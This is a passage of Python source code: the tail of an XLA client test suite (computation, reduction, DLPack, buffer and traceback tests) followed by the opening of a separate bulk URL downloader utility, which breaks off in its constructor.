[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]],
dtype=dtype)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testCall(self, dtype):
c = self._NewComputation()
ops.Call(
c,
self._CreateMulBy2Computation(dtype),
operands=(ops.Constant(c, dtype(5.0)),))
self._ExecuteAndCompareClose(c, expected=[10.0])
@parameterized.named_parameters({
"testcase_name": "_{}_{}".format(in_dtype.__name__, out_dtype.__name__),
"in_dtype": in_dtype,
"out_dtype": out_dtype,
} for in_dtype, out_dtype in [[np.float32, np.int32]])
def testMapEachElementToConstant(self, in_dtype, out_dtype):
c = self._NewComputation()
ops.Map(c,
[ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=in_dtype))],
self._CreateConstantComputation(in_dtype, out_dtype), [0])
self._ExecuteAndCompareExact(c, expected=[[1, 1, 1, 1]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testMapMulBy2(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
c = self._NewComputation()
ops.Map(c, [ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=dtype))],
self._CreateMulBy2Computation(dtype), [0])
self._ExecuteAndCompareClose(c, expected=[[2.0, 4.0, 6.0, 8.0]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testSimpleMapChain(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
# Chains a map of constant-out with a map of mul-by-2
c = self._NewComputation()
const = ops.Map(
c, [ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=dtype))],
self._CreateConstantComputation(dtype, dtype), [0])
ops.Map(c, [const], self._CreateMulBy2Computation(dtype), [0])
self._ExecuteAndCompareClose(c, expected=[[2.0, 2.0, 2.0, 2.0]])
# TODO(b/154752816): bfloat16 crashes in evaluator.
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes if dtype != bfloat16)
def testDivVectorsWithMap(self, dtype):
def DivComputation():
c = self._NewComputation("div_param0_by_param1")
shape = xla_client.shape_from_pyval(np.array(0, dtype=dtype))
ops.Div(ops.Parameter(c, 0, shape), ops.Parameter(c, 1, shape))
return c.build()
c = self._NewComputation()
ops.Map(c, (ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=dtype)),
ops.Constant(c, np.array([5.0, 5.0, 4.0, 4.0], dtype=dtype))),
DivComputation(), [0])
self._ExecuteAndCompareClose(
c, expected=[[0.2, 0.4, 0.75, 1.0]], rtol=1e-3)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testSelectAndScatter(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
c = self._NewComputation()
operand = ops.Constant(
c, np.array([[1., 2., 6.], [4., 5., 3.]], dtype=dtype))
window_dimensions = (2, 1)
window_strides = (1, 2)
padding = xla_client.window_padding_type_to_pad_values(
xla_client.PaddingType.VALID,
c.get_shape(operand).dimensions(), window_dimensions, window_strides)
ops.SelectAndScatterWithGeneralPadding(
operand,
select=self._CreateBinaryGeComputation(dtype),
window_dimensions=window_dimensions,
window_strides=window_strides,
padding=padding,
source=ops.Constant(c, np.array([[0.1, 0.2]], dtype=dtype)),
init_value=ops.Constant(c, np.array(1, dtype=dtype)),
scatter=self._CreateBinaryAddComputation(dtype))
self._ExecuteAndCompareClose(
c, expected=[[[1., 1., 1.2], [1.1, 1., 1.]]], rtol=5e-3)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testReduce1DtoScalar(self, dtype):
c = self._NewComputation()
ops.Reduce(
c,
operands=[
ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=dtype))
],
init_values=[ops.Constant(c, dtype(0))],
computation=self._CreateBinaryAddComputation(dtype),
dimensions_to_reduce=[0])
self._ExecuteAndCompareClose(c, expected=[10])
# TODO(phawkins): test comparison harness doesn't support bfloat16
@parameterized.named_parameters({
"testcase_name": "_{}_dim{}".format(dtype.__name__, dim),
"dtype": dtype,
"dim": dim,
} for dtype in float_dtypes if dtype != bfloat16 for dim in range(2))
def testReduce2DTo1D(self, dtype, dim):
input_array = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]], dtype=dtype)
c = self._NewComputation()
ops.Reduce(
c,
operands=[ops.Constant(c, input_array)],
init_values=[ops.Constant(c, dtype(0))],
computation=self._CreateBinaryAddComputation(dtype),
dimensions_to_reduce=[dim])
self._ExecuteAndCompareClose(c, expected=[np.sum(input_array, axis=dim)])
@parameterized.named_parameters({
"testcase_name": "_{}_dims[{}]".format(dtype.__name__, dims),
"dtype": dtype,
"dims": tuple(dims)
} for dtype in float_dtypes for dims in itertools.permutations(range(3)))
def testReduce3DAllPossibleWaysF32(self, dtype, dims):
input_array = self._MakeSample3DArray(dtype)
c = self._NewComputation()
ops.Reduce(
c,
operands=[ops.Constant(c, input_array)],
init_values=[ops.Constant(c, dtype(0))],
computation=self._CreateBinaryAddComputation(dtype),
dimensions_to_reduce=dims)
self._ExecuteAndCompareClose(c, expected=[np.sum(input_array, axis=dims)])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testReduceWindowValidUnitStrides(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
input_array = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]], dtype=dtype)
c = self._NewComputation()
window_dimensions = (2, 1)
window_strides = (1, 1)
padding = xla_client.window_padding_type_to_pad_values(
xla_client.PaddingType.VALID, input_array.shape, window_dimensions,
window_strides)
ops.ReduceWindowWithGeneralPadding(
operand=ops.Constant(c, input_array),
init_value=ops.Constant(c, dtype(0)),
computation=self._CreateBinaryAddComputation(dtype),
window_dimensions=window_dimensions,
window_strides=window_strides,
base_dilations=[],
window_dilations=[],
padding=padding)
self._ExecuteAndCompareClose(c, expected=[[[5., 7., 9.]]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testReduceWindowSameUnitStrides(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
input_array = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]], dtype=dtype)
c = self._NewComputation()
window_dimensions = (2, 1)
window_strides = (1, 1)
padding = xla_client.window_padding_type_to_pad_values(
xla_client.PaddingType.SAME, input_array.shape, window_dimensions,
window_strides)
ops.ReduceWindowWithGeneralPadding(
operand=ops.Constant(c, input_array),
init_value=ops.Constant(c, dtype(0)),
computation=self._CreateBinaryAddComputation(dtype),
window_dimensions=window_dimensions,
window_strides=window_strides,
base_dilations=[],
window_dilations=[],
padding=padding)
self._ExecuteAndCompareClose(c, expected=[[[5., 7., 9.], [4., 5., 6.]]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testReduceWindowValidGeneralStrides(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
input_array = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]], dtype=dtype)
c = self._NewComputation()
window_dimensions = (2, 1)
window_strides = (1, 2)
padding = xla_client.window_padding_type_to_pad_values(
xla_client.PaddingType.VALID, input_array.shape, window_dimensions,
window_strides)
ops.ReduceWindowWithGeneralPadding(
operand=ops.Constant(c, input_array),
init_value=ops.Constant(c, dtype(0)),
computation=self._CreateBinaryAddComputation(dtype),
window_dimensions=window_dimensions,
window_strides=window_strides,
base_dilations=[],
window_dilations=[],
padding=padding)
self._ExecuteAndCompareClose(c, expected=[[[5., 9.]]])
def testReduceWindowVariadic(self):
c = self._NewComputation("reducer")
shape = xla_client.shape_from_pyval(np.array(0, dtype=np.int32))
shape = shape.with_major_to_minor_layout_if_absent()
ps = [ops.Parameter(c, i, shape) for i in range(4)]
which = ops.Ge(ps[0], ps[2])
ops.Tuple(
c, [ops.Select(which, ps[0], ps[2]),
ops.Select(which, ps[1], ps[3])])
reducer = c.build()
key_array = np.array([[1, 5, 6], [4, 2, 3]], dtype=np.int32)
val_array = np.array([[7, 8, 9], [10, 11, 12]], dtype=np.int32)
c = self._NewComputation()
window_dimensions = (2, 1)
window_strides = (1, 1)
padding = xla_client.window_padding_type_to_pad_values(
xla_client.PaddingType.VALID, key_array.shape, window_dimensions,
window_strides)
ops.ReduceWindowWithGeneralPadding(
operands=[ops.Constant(c, key_array),
ops.Constant(c, val_array)],
init_values=[
ops.Constant(c, np.int32(0)),
ops.Constant(c, np.int32(0))
],
computation=reducer,
window_dimensions=window_dimensions,
window_strides=window_strides,
base_dilations=[],
window_dilations=[],
padding=padding)
self._ExecuteAndCompareClose(c, expected=[[[4, 5, 6]], [[10, 8, 9]]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testWhile(self, dtype):
def LessThan10Cond():
c = self._NewComputation("test_lt_10")
shape = xla_client.shape_from_pyval(np.array(0, dtype=dtype))
ops.Lt(ops.Parameter(c, 0, shape), ops.Constant(c, dtype(10.)))
return c.build()
cond = LessThan10Cond()
body = self._CreateMulBy2Computation(dtype)
c = self._NewComputation()
init = ops.Constant(c, dtype(1.))
ops.While(cond, body, init)
self._ExecuteAndCompareClose(c, expected=[16.])
def testConditionalTrue(self):
c = self._NewComputation()
pred = ops.Constant(c, np.bool_(True))
true_operand = ops.Constant(c, np.float32(3.))
true_computation = self._CreateMulBy2Computation(np.float32)
false_operand = ops.Constant(c, np.float32(2.))
false_computation = self._CreateConstantComputation(
np.float32, np.float32)
ops.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=[6.])
def testConditionalFalse(self):
c = self._NewComputation()
pred = ops.Constant(c, np.bool_(False))
true_operand = ops.Constant(c, np.float32(3.))
true_computation = self._CreateMulBy2Computation(np.float32)
false_operand = ops.Constant(c, np.float32(2.))
false_computation = self._CreateConstantComputation(
np.float32, np.float32)
ops.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=[1.])
@unittest.skipIf(cloud_tpu, "not implemented")
def testInfeedS32Values(self):
to_infeed = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
ops.GetTupleElement(
ops.InfeedWithToken(
ops.CreateToken(c),
xla_client.shape_from_pyval(
to_infeed[0]).with_major_to_minor_layout_if_absent()), 0)
compiled_c = self.backend.compile(c.build())
device = self.backend.local_devices()[0]
for item in to_infeed:
device.transfer_to_infeed(item)
for item in to_infeed:
result, = xla_client.execute_with_python_values(
compiled_c, (), backend=self.backend)
self.assertEqual(result, item)
@unittest.skipIf(cloud_tpu, "not implemented")
def testInfeedTuple(self):
to_infeed = (NumpyArrayS32([1, 2, 3, 4]), NumpyArrayS32([[7], [8]]))
c = self._NewComputation()
ops.GetTupleElement(
ops.InfeedWithToken(
ops.CreateToken(c),
xla_client.shape_from_pyval(
to_infeed).with_major_to_minor_layout_if_absent()), 0)
compiled_c = self.backend.compile(c.build())
device = self.backend.local_devices()[0]
device.transfer_to_infeed(to_infeed)
result = xla_client.execute_with_python_values(
compiled_c, (), backend=self.backend)
self.assertLen(result, 2)
np.testing.assert_equal(result[0], to_infeed[0])
np.testing.assert_equal(result[1], to_infeed[1])
@unittest.skipIf(cloud_tpu, "not implemented")
def testInfeedThenOutfeedS32(self):
to_round_trip = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
x_and_token = ops.InfeedWithToken(
ops.CreateToken(c),
xla_client.shape_from_pyval(
to_round_trip[0]).with_major_to_minor_layout_if_absent())
x = ops.GetTupleElement(x_and_token, 0)
token = ops.GetTupleElement(x_and_token, 1)
outfeed_shape = xla_client.shape_from_pyval(
to_round_trip[0]).with_major_to_minor_layout_if_absent()
ops.OutfeedWithToken(x, token, outfeed_shape)
compiled_c = self.backend.compile(c.build())
device = self.backend.local_devices()[0]
for want in to_round_trip:
execution = threading.Thread(target=lambda: compiled_c.execute([]))
execution.start()
device.transfer_to_infeed(want)
got = device.transfer_from_outfeed(outfeed_shape)
execution.join()
self.assertEqual(want, got)
def testScatter(self):
a = np.arange(9).astype(np.int32).reshape((3, 3))
scatter_indices = np.array([0, 2], dtype=np.int32)
updates = np.array([[10, 20, 30], [70, 80, 90]], dtype=np.int32)
dnums = xla_client.ScatterDimensionNumbers()
dnums.update_window_dims.append(1)
dnums.inserted_window_dims.append(0)
dnums.scatter_dims_to_operand_dims.append(0)
dnums.index_vector_dim = 1
c = self._NewComputation()
ops.Scatter(
ops.Constant(c, a), ops.Constant(c, scatter_indices),
ops.Constant(c, updates), self._CreateBinaryAddComputation(np.int32),
dnums)
expected = np.array([[10, 21, 32], [3, 4, 5], [76, 87, 98]],
dtype=np.int32)
self._ExecuteAndCompareClose(c, expected=[expected])
class DeviceTest(ComputationTest):
def testPlatform(self):
for device in self.backend.local_devices():
self.assertEqual(device.platform, self.backend.platform)
tests.append(DeviceTest)
class ErrorTest(ComputationTest):
def setUp(self):
super(ErrorTest, self).setUp()
self.f32_scalar_2 = NumpyArrayF32(2.0)
self.s32_scalar_2 = NumpyArrayS32(2)
def testCompileWithWrongElementTypeInLayout(self):
c = self._NewComputation()
c.set_op_metadata(xla_client.CurrentSourceInfoMetadata())
ops.Parameter(c, 0, xla_client.shape_from_pyval(self.s32_scalar_2))
c.clear_op_metadata()
options = xla_client.CompileOptions()
options.argument_layouts = [
xla_client.Shape.array_shape(np.dtype(np.float32), [])
]
def TestFun():
return self.backend.compile(c.build(), compile_options=options)
self.assertRaisesRegex(
RuntimeError, r".*Invalid argument shape.*"
r"expected s32\[\], got f32\[\].*", TestFun)
def testInvokeWithWrongElementType(self):
c = self._NewComputation()
c.set_op_metadata(xla_client.CurrentSourceInfoMetadata())
ops.Parameter(c, 0, xla_client.shape_from_pyval(self.s32_scalar_2))
c.clear_op_metadata()
def TestFun():
return xla_client.execute_with_python_values(
self.backend.compile(c.build()), [self.f32_scalar_2], self.backend)
self.assertRaisesRegex(
RuntimeError, r"Invalid argument: Argument does not match.*"
r"want s32\[\], got f32\[\].*", TestFun)
tests.append(EmbeddedComputationsTest)
class ComputationRootTest(ComputationTest):
"""Tests related to setting the root of the computation."""
def testComputationRootDifferentFromLastOp(self):
c = self._NewComputation()
x = ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(2.0)))
result = ops.Add(x, ops.Constant(c, np.float32(3.14)))
ops.Add(result, ops.Constant(c, np.float32(1.618)))
arg = NumpyArrayF32(1.0)
compiled_c = self.backend.compile(c.build(result))
ans, = xla_client.execute_with_python_values(
compiled_c, [arg], backend=self.backend)
np.testing.assert_allclose(ans, 4.14)
tests.append(ComputationRootTest)
class SetShardingTest(ComputationTest):
"""Tests related to set OpSharding."""
def testSetSharding(self):
c = self._NewComputation()
sharding = xla_client.OpSharding()
sharding.type = xla_client.OpSharding.Type.REPLICATED
sharding.tile_assignment_dimensions = [1]
sharding.tile_assignment_devices = [0]
c.set_sharding(sharding)
x = ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(2.0)))
c.clear_sharding()
result = ops.Add(x, ops.Constant(c, np.float32(3.14)))
ops.Add(result, ops.Constant(c, np.float32(1.618)))
arg = NumpyArrayF32(1.0)
compiled_c = self.backend.compile(c.build(result))
ans, = xla_client.execute_with_python_values(
compiled_c, [arg], backend=self.backend)
np.testing.assert_allclose(ans, 4.14)
tests.append(SetShardingTest)
testcase_shapes = [
(),
(1,),
(2, 3),
(2, 0),
(0, 7),
(4, 1, 2),
(2, 1, 3),
(2, 4, 1),
(3, 1),
(1, 3),
]
def FormatShapeAndDtype(shape, dtype):
return "_{}[{}]".format(np.dtype(dtype).name, ",".join(map(str, shape)))
class DLPackTest(parameterized.TestCase):
def setUp(self):
super(DLPackTest, self).setUp()
self.backend = xla_backend()
if self.backend.platform not in ("cpu", "gpu"):
self.skipTest("DLPack requires CPU or GPU")
self.cpu_backend = (
self.backend
if self.backend.platform == "cpu" else xla_client.make_cpu_client())
self.gpu_backend = (
self.backend if self.backend.platform == "gpu" else None)
# pylint: disable=g-complex-comprehension
# pyformat: disable
@parameterized.named_parameters({
"testcase_name": "{}_own={}_gpu={}".format(
FormatShapeAndDtype(shape, dtype), take_ownership, gpu),
"dtype": dtype,
"shape": shape,
"take_ownership": take_ownership,
"gpu": gpu
} for dtype in dlpack_dtypes for shape in testcase_shapes
for take_ownership in [False, True]
for gpu in [False, True])
# pyformat: enable
def testRoundTrip(self, dtype, shape, take_ownership, gpu):
if gpu and self.gpu_backend is None:
raise unittest.SkipTest("Test not running with GPU support")
backend = self.gpu_backend if gpu else self.cpu_backend
if dtype == np.bool_:
x = np.random.randint(0, 2, size=shape).astype(np.bool_)
else:
x = np.array(np.random.rand(*shape) * 100, dtype=dtype)
buffer = backend.buffer_from_pyval(x)
dlt = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=take_ownership)
del buffer # Free "buffer" to make sure dlt retains ownership.
self.assertEqual(type(dlt).__name__, "PyCapsule")
y = xla_client._xla.dlpack_managed_tensor_to_buffer(
dlt, self.cpu_backend, self.gpu_backend)
np.testing.assert_array_equal(
x.astype(np.uint8) if dtype == np.bool_ else x, y.to_py())
def testTensorsCanBeConsumedOnceOnly(self):
x = np.array(np.random.rand(3, 4, 5, 6), dtype=np.float32)
buffer = self.backend.buffer_from_pyval(x)
dlt = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=True)
def ConsumeDLPackTensor():
_ = xla_client._xla.dlpack_managed_tensor_to_buffer(dlt, self.backend)
ConsumeDLPackTensor()
self.assertRaisesRegex(
RuntimeError, ".*a DLPack tensor may be consumed at most once.*",
ConsumeDLPackTensor)
def testTensorsCanBeOwnedOnceOnly(self):
x = np.array(np.random.rand(3, 4, 5, 6), dtype=np.float32)
buffer = self.backend.buffer_from_pyval(x)
_ = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=True)
self.assertTrue(buffer.is_deleted())
with self.assertRaisesRegex(
RuntimeError,
"Cannot convert deleted/invalid buffer to DLPack tensor.*"):
_ = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=True)
def testNonOwnedDlpackCanBeViewedTwice(self):
x = np.array(np.random.rand(3, 4, 5, 6), dtype=np.float32)
buffer = self.backend.buffer_from_pyval(x)
d1 = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=False)
d2 = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=False)
y = xla_client._xla.dlpack_managed_tensor_to_buffer(d1, self.backend)
z = xla_client._xla.dlpack_managed_tensor_to_buffer(d2, self.backend)
del d1, d2
np.testing.assert_array_equal(x, buffer.to_py())
np.testing.assert_array_equal(x, y.to_py())
np.testing.assert_array_equal(x, z.to_py())
tests.append(DLPackTest)
class BufferProtocolTest(parameterized.TestCase):
def setUp(self):
super(BufferProtocolTest, self).setUp()
self.backend = xla_backend()
if self.backend.platform != "cpu":
self.skipTest("Test requires CPU")
# pylint: disable=g-complex-comprehension
@parameterized.named_parameters({
"testcase_name": FormatShapeAndDtype(shape, dtype),
"dtype": dtype,
"shape": shape
} for dtype in standard_dtypes if dtype != bfloat16
for shape in testcase_shapes)
def testRoundTrip(self, dtype, shape):
x = np.array(np.random.rand(*shape) * 100, dtype=dtype)
x_ptr = x.__array_interface__["data"][0]
buffer = self.backend.buffer_from_pyval(
x, host_buffer_semantics=xla_client.HostBufferSemantics.ZERO_COPY)
y = np.array(buffer, copy=False)
y_ptr = y.__array_interface__["data"][0]
np.testing.assert_array_equal(x, y)
# If the input was sufficiently aligned, the input and output should
# alias.
self.assertTrue((x_ptr & 15) != 0 or x_ptr == y_ptr)
self.assertEqual(y_ptr, buffer.unsafe_buffer_pointer())
during_call = xla_client.HostBufferSemantics.IMMUTABLE_ONLY_DURING_CALL
buffer2 = self.backend.buffer_from_pyval(
x, host_buffer_semantics=during_call)
z = np.array(buffer2, copy=False)
self.assertNotEqual(x.__array_interface__["data"][0],
z.__array_interface__["data"][0])
def testDeleteWithActiveView(self):
x = np.random.randn(20, 10)
buffer = self.backend.buffer_from_pyval(x)
buffer_ptr = buffer.unsafe_buffer_pointer()
y = np.array(buffer, copy=False)
buffer.delete()
# It is still legal to access `y`; the array view must keep it alive.
np.testing.assert_array_equal(x, y)
self.assertEqual(y.__array_interface__["data"][0], buffer_ptr)
tests.append(BufferProtocolTest)
class TracebackTest(absltest.TestCase):
def setUp(self):
super(TracebackTest, self).setUp()
self.backend = xla_backend()
def testNoTracebacksIfDisabled(self):
with xla_client.tracebacks(enabled=False):
self.assertEqual(None, xla_client.Traceback.get_traceback())
buffer = self.backend.buffer_from_pyval(np.array(7, np.int32))
self.assertEqual(None, buffer.traceback)
b = xla_client.XlaBuilder("computation")
ops.Add(ops.Constant(b, np.int32(1)), ops.Constant(b, np.int32(2)))
e = self.backend.compile(b.build())
self.assertEqual(None, e.traceback)
def assertIsTracebackContaining(self, tb, function):
self.assertIsInstance(tb, xla_client.Traceback)
self.assertIn(function, str(tb))
self.assertTrue(any(f.function_name == function for f in tb.frames))
def testTracebacks(self):
with xla_client.tracebacks(enabled=True):
tb = xla_client.Traceback.get_traceback()
self.assertIsTracebackContaining(tb, "testTracebacks")
# Tracebacks are not implemented on the TPU driver extension's variant
# of buffers and executables.
if not isinstance(self.backend, xla_client.Client):
return
buffer = self.backend.buffer_from_pyval(np.array(7, np.int32))
self.assertIsTracebackContaining(buffer.traceback, "testTracebacks")
b = xla_client.XlaBuilder("computation")
ops.Add(ops.Constant(b, np.int32(1)), ops.Constant(b, np.int32(2)))
e = self.backend.compile(b.build())
self.assertIsTracebackContaining(e.traceback, "testTracebacks")
def testNestedFunction(self):
def AFunction():
def AnotherFunction():
return xla_client.Traceback.get_traceback()
return AnotherFunction()
with xla_client.tracebacks(enabled=True):
tb = AFunction()
self.assertIsInstance(tb, xla_client.Traceback)
frames = tb.frames
i = next(
i for (i, f) in enumerate(frames) if f.function_name == "AFunction")
self.assertEqual(frames[i - 1].function_name, "AnotherFunction")
self.assertEqual(frames[i + 1].function_name, "testNestedFunction")
tests.append(TracebackTest)
class ClientTest(ComputationTest):
def setUp(self):
super(ClientTest, self).setUp()
self.backend = xla_backend()
def testPlatformVersion(self):
version = self.backend.platform_version
logging.info("platform_version:\n%s", version)
if self.backend.platform == "cpu":
self.assertEqual(version, "<unknown>")
elif self.backend.platform == "gpu":
# Following is false if not built with --config=cuda
if test_util.is_gpu_available(cuda_only=True):
self.assertTrue(
re.match(r"^cuda \d{4,}$", version),
msg=f"Expected CUDA version string; got {repr(version)}")
else:
self.assertEqual(version, "<unknown>")
elif self.backend.platform == "tpu" and not cloud_tpu:
self.assertIn("tpu", version.lower())
self.assertIn("cl/", version)
@unittest.skipIf(cloud_tpu or tfrt_tpu, "not implemented")
def testExecutableSerialization(self):
if self.backend.platform != "tpu":
self.skipTest("Test requires tpu platform")
c = self._NewComputation()
ops.Add(
ops.Constant(c, NumpyArrayS32([1, 2])),
ops.Constant(c, NumpyArrayS32([3, 4])))
options = xla_client.CompileOptions()
executable = self.backend.compile(c.build(), options)
self.assertLen(executable.hlo_modules(), 1)
serialized = self.backend.serialize_executable(executable)
deserialized = self.backend.deserialize_executable(
serialized,
executable.hlo_modules()[0], options)
expected, = xla_client.execute_with_python_values(executable, (),
self.backend)
actual, = xla_client.execute_with_python_values(deserialized, (),
self.backend)
self.assertTrue(np.all(actual == expected))
tests.append(ClientTest)
# TODO(b/182461453): Add TFRT and cloud TPU implementation of
# ReadDynamicShapes
class DynamicReshapeTest(ComputationTest):
"""Tests related to DynamicReshape."""
def _CompareToPyAndBufferProtocol(self, builder, args, expected_results,
test_fn):
compiled = self.backend.compile(builder.build())
output_buffers = compiled.execute([
self.backend.buffer_from_pyval(
arg, device=compiled.local_devices()[0]) for arg in args
])
self.assertLen(output_buffers, len(expected_results))
for buf, expected in zip(output_buffers, expected_results):
to_py_result = buf.to_py()
self.assertEqual(expected.shape, to_py_result.shape)
test_fn(expected, to_py_result)
if self.backend.platform == "cpu" and buf.dtype != bfloat16:
mview = memoryview(buf)
self.assertEqual(expected.shape, mview.shape)
test_fn(expected, np.asarray(mview))
else:
# Buffer protocol expected to fail on non-cpu platforms and bfloat16
# Note that np.asarray(buf) doesn't throw an exception. To test if the
# error was thrown properly we must use memoryview(buf).
with self.assertRaises(BufferError):
memoryview(buf)
# 1D reshape of full size, half size, and size of 0.
@unittest.skipIf(cloud_tpu or tfrt_tpu or external_tpu, "not implemented")
@parameterized.parameters((5), (3), (0))
def testReshape1D(self, reshape_size):
full_size = 5
c = self._NewComputation()
arg = np.array(reshape_size, dtype=np.int32)
expected = np.array(range(reshape_size), dtype=np.int32)
p = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg))
ops.DynamicReshape(
ops.Constant(c, NumpyArrayS32(range(full_size))), [p], [full_size],
[True])
self._CompareToPyAndBufferProtocol(c, [arg], [expected],
np.testing.assert_equal)
# 2D reshape with an slice on the minor dimension. We test different types
# where the strides may differ between the host and devices. The reshaped
# physical memory layout is not consecutive, and we test if the program can
# return the correct logical view of the data.
@unittest.skipIf(cloud_tpu or tfrt_tpu or external_tpu, "not implemented")
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in int_dtypes + float_dtypes)
def testReshape2D(self, dtype):
arg0 = np.array([[1, 2, 3], [4, 5, 6]], dtype=dtype)
arg1 = np.array(2, dtype=np.int32)
expected = np.array([[1, 2], [4, 5]], dtype=np.int32)
c = self._NewComputation()
p0 = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg0))
p1 = ops.Parameter(c, 1, xla_client.shape_from_pyval(arg1))
ops.DynamicReshape(p0, [p1, p1], [2, 3], [False, True])
self._CompareToPyAndBufferProtocol(c, [arg0, arg1], [expected],
np.testing.assert_equal)
@unittest.skipIf(cloud_tpu or tfrt_tpu, "not implemented")
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in int_dtypes + float_dtypes)
def testDynamicShapeArgs(self, dtype):
full_size = 10
dynamic_shape_size = 4
# subcomputation 1
binary_add_builder = self._NewComputation()
scalar_shape = xla_client.Shape.scalar_shape(np.dtype(dtype))
ops.Add(
ops.Parameter(binary_add_builder, 0, scalar_shape),
ops.Parameter(binary_add_builder, 1, scalar_shape))
# subcomputation 2
reshape_reduce_builder = self._NewComputation()
dshape = xla_client.Shape.array_shape(
np.dtype(dtype), dims=[full_size], dynamic_dimensions=[True])
reshape_reduce_p = ops.Parameter(reshape_reduce_builder, 0, dshape)
ops.Reduce(
reshape_reduce_builder,
operands=[reshape_reduce_p],
init_values=[ops.Constant(reshape_reduce_builder, dtype(0))],
computation=binary_add_builder.build(),
dimensions_to_reduce=[0])
# main computation: sum(range(full_size)[:dynamic_shape_size])
c = self._NewComputation()
arg = np.array(dynamic_shape_size, dtype=np.int32)
p = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg))
reshaped = ops.DynamicReshape(
ops.Constant(c, np.array(range(full_size), dtype=dtype)), [p],
[full_size], [True])
ops.Call(c, reshape_reduce_builder.build(), operands=(reshaped,))
self._ExecuteAndCompareClose(c, [arg], [dtype(6)])
tests.append(DynamicReshapeTest)
class DeviceAssignmentTest(ComputationTest):
def testSerialize(self):
shape = (3, 4)
device_assignment = xla_client.DeviceAssignment.create(
np.arange(np.prod(shape)).reshape(*shape))
self.assertEqual(device_assignment.replica_count(), shape[0])
self.assertEqual(device_assignment.computation_count(), shape[1])
serialized = device_assignment.serialize()
self.assertIsInstance(serialized, bytes)
self.assertNotEmpty(serialized)
tests.append(DeviceAssignmentTest)
return tests
def InstantiateTests(globals_dict, backend_fn, test_prefix="", **kw):
# Avoid creating a new backend per test (this causes GPU OOM, and is probably
# inefficient).
backend_fn = functools.lru_cache(maxsize=None)(backend_fn)
for klass in TestFactory(backend_fn, **kw):
test = type(test_prefix + klass.__name__, (klass,), {})
# Clean up the qualified names of the tests to not include the test factory.
test.__qualname__ = test.__name__
globals_dict[test.__name__] = test
backends = {
"cpu": xla_client.make_cpu_client,
"gpu": xla_client.make_gpu_client,
}
if __name__ == "__main__":
flags.DEFINE_string("backend", "cpu", "Target platform.")
# pylint: disable=unnecessary-lambda
InstantiateTests(globals(), lambda: backends[FLAGS.backend]())
# pylint: enable=unnecessary-lambda
absltest.main()
|
bulk_downloader.py
|
import os, time, datetime, sys
from threading import Thread
import requests
from time import time, sleep
import queue
import logging
import progressbar
class fetchURLs(object):
'''
Download and save a list of URLs
using parallel connections. A separate session is maintained for each
download thread. If throttling is detected (broken connections)
the thread is terminated in order to reduce the load on the web serve.
If a local file already exists for a given URL, that URL is skipped.
There is no check currently if remote document is newer than the
local file. If the URL does not end with a file name fetchURLs
will generate a default filename in the format <website>.index.html
:param urls: A list of absolute URLs to fetch
:param data_dir: Directory to save files in
:param connections: Number of simultanious download threads
:param auth: Username and password touple, if needed for website authentication
:param log: An optional logging.getLogger() instance
This class is usually called from IceCat
'''
def __init__(self,
log=None,
urls = [
'http://www.google.com/',
